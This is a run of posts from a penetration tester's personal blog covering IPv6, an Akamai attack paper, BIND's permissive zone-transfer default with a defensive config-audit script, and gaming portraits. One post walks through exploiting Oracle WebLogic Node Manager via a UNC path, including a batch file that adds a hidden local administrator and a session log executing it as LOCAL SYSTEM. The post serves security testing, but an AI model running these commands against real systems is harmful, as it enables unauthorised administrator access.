Finally, dmcdonald.net has some IPv6 goodness.

$ nslookup dmcdonald.net
Non-authoritative answer:
Server:  google-public-dns-a.google.com
Address:  8.8.8.8

Name:    dmcdonald.net
Addresses:  2001:41c8:1:6340::a2
212.110.191.162

The Pentester’s Guide to Akamai

Through my employer, NCC Group PLC, I’ve just released an interesting paper on Akamai, which includes a number of ways of going about attacking a website using Akamai. It’s my first, but I am quite pleased with it. Check it out at http://www.nccgroup.com/en/blog/2013/03/the-pentester’s-guide-to-akamai/

Zone Transfers are Allowed by Default by BIND9?

Set up my first BIND servers in ~9 years. After setting up the primary to accept zone transfers from the slave, and configuring the slave to use the primary as a master, I thought I’d better double-check that zone transfers were not possible from any random IP address.

The master DNS server rejected the requests as expected, but the slave happily served up the zone to anyone who requested it. After a bit of reading I was rather surprised to find out that BIND’s default behaviour for zone transfers, when no allow-transfer statement is present, is equivalent to

allow-transfer { any; };   // who may request AXFR/IXFR of the zone

I guess I was not security conscious enough ~9 years ago to care if someone could do a zone transfer, as I figure I would have remembered something like this. Adding the following line to my zone sorted it out, but I’m still kind of shocked this is default behaviour.

allow-transfer { none; };   // the slave never needs to hand the zone out
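Because the risky case is a zone with no allow-transfer statement at all, rather than one that says `any` outright, it is easy to miss on a quick read of named.conf. The following audit script is an added example, not the blog’s own code: it walks a named.conf, resolves each zone’s effective allow-transfer list (zone statement, then the options block, then BIND’s built-in default of `any`), and reports every zone that ends up transferable to anyone. The two configs it runs against are constructed samples with documentation addresses; the hardened copy sets `allow-transfer { none; };` globally so that only zones which opt in are transferable.

```python
import re

# Constructed sample named.conf, not the blog's own config: the primary zone
# restricts transfers, the secondary zone never sets allow-transfer (so
# BIND's default of { any; } applies), and one zone opens transfers explicitly.
SAMPLE_NAMED_CONF = """
options {
    directory "/var/named";
    // no global allow-transfer here, so unset zones inherit BIND's default
};

zone "example.net" IN {
    type master;
    file "example.net.zone";
    allow-transfer { 203.0.113.53; };
};

zone "example.org" IN {
    type slave;
    masters { 203.0.113.53; };
    file "slaves/example.org";
};

zone "example.com" IN {
    type master;
    file "example.com.zone";
    allow-transfer { any; };
};
"""

# Same layout with the fix applied globally: nothing is transferable unless a
# zone says so explicitly, and the one open zone is pinned to the secondary.
HARDENED_NAMED_CONF = SAMPLE_NAMED_CONF.replace(
    'directory "/var/named";',
    'directory "/var/named";\n    allow-transfer { none; };',
).replace("allow-transfer { any; };", "allow-transfer { 203.0.113.53; };")


def strip_comments(text):
    """Drop the three comment styles named.conf accepts: /* */, // and #."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    return re.sub(r"(//|#)[^\n]*", "", text)


def top_level_blocks(text):
    """Yield (header, body) for each top-level `header { body };` statement,
    walking braces so nested blocks such as masters { ... } stay inside."""
    pos = 0
    while True:
        open_brace = text.find("{", pos)
        if open_brace == -1:
            return
        header = text[text.rfind(";", 0, open_brace) + 1:open_brace].strip()
        depth, i = 0, open_brace
        while i < len(text):
            if text[i] == "{":
                depth += 1
            elif text[i] == "}":
                depth -= 1
                if depth == 0:
                    break
            i += 1
        yield header, text[open_brace + 1:i]
        pos = i + 1


ACL_RE = re.compile(r"allow-transfer\s*\{([^}]*)\}")


def transfer_acl(body):
    """Return the allow-transfer address list, or None when the block has none."""
    m = ACL_RE.search(body)
    if m is None:
        return None
    return [e.strip() for e in m.group(1).split(";") if e.strip()]


def audit(conf):
    """Return (zone, origin, acl) for every zone that ends up transferable to
    anyone: set explicitly in the zone, inherited from options, or through
    BIND's built-in default of { any; } when nothing is set at all."""
    text = strip_comments(conf)
    blocks = list(top_level_blocks(text))
    global_acl = None
    for header, body in blocks:
        if header == "options":
            global_acl = transfer_acl(body)
    findings = []
    for header, body in blocks:
        m = re.match(r'zone\s+"([^"]+)"', header)
        if not m:
            continue
        acl, origin = transfer_acl(body), "zone"
        if acl is None:
            acl, origin = global_acl, "options"
        if acl is None:
            acl, origin = ["any"], "default"
        if "any" in acl:
            findings.append((m.group(1), origin, acl))
    return findings


if __name__ == "__main__":
    for zone, origin, acl in audit(SAMPLE_NAMED_CONF):
        print(f"{zone}: transferable to anyone (allow-transfer from {origin}: {acl})")
    print("hardened config findings:", audit(HARDENED_NAMED_CONF))
```

Run as a script it flags example.org (no statement anywhere, so the default applies) and example.com (explicit `any`), and reports nothing for the hardened copy. The brace walker is deliberately simple: it understands named.conf’s `name { ... };` statements and its three comment styles, which is enough to resolve allow-transfer, but it is not a full named.conf parser, so `include` files must be concatenated before auditing.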

Oracle Web Logic Node Manager UNC Path Remote File Execution

Keep running into old WebLogic installations which have the file traversal (http://www.securityfocus.com/bid/37926/info) and UNC path remote command execution (http://www.kb.cert.org/vuls/id/924300) vulns in them.

The file traversal one is rubbish as you can’t specify any command-line arguments AFAIK (do tell me if I’m wrong, please).

The UNC one requires that you have a WebLogic domain accessible via a UNC path. Too much of a pain in the arse to do in the middle of a test. Could not find one online, so I downloaded an older version of WebLogic and set up a little WL domain with a little batch file to run the following…

@ECHO OFF

net user /add wlcetest WLCETest99*
net localgroup administrators /add wlcetest

The username and password for the WL domain are weblogic / w3bl0g1c.

Download it here. It’s for 10.3.2, no idea if it’ll work on other versions of WebLogic.

Here it is in action…

user@host:~$ openssl s_client -connect 192.168.0.1:5556
CONNECTED(00000003)
<snip>

hello
+OK Node manager v10.3 started
domain cetest1 \\192.168.0.2\share
+OK Current domain set to 'cetest1'
execscript addlocaladmin.bat
+OK Script 'addlocaladmin.bat' executed

Add and modify the batch scripts in bin/service_migration/ to execute any commands you like as LOCAL SYSTEM.

Typically, Nessus doesn’t pick up the UNC issue, nor does it pick up the file traversal one if the domain directory structure is sitting on a drive letter other than C:\. This is because its file traversal test case looks for ..\..\..\..\..\..\windows\system32\ipconfig.exe, which it can’t find on D:\, E:\, Z:\ or whatever the domain lives on.

Portraits for Traveller

Been really struggling to find pictures suitable for my Monday night Traveller game. I got so fed up I signed up for a free account on EVE Online and used their awesome character builder, Alt+PrintScreen, and MS Paint to knock some up.

http://dmcdonald.net/scifi-avatars/

Not bad, eh?

First Post

Using a new website, and rather bravely (stupidly?) using WordPress. Just in the process of moving all the old content over.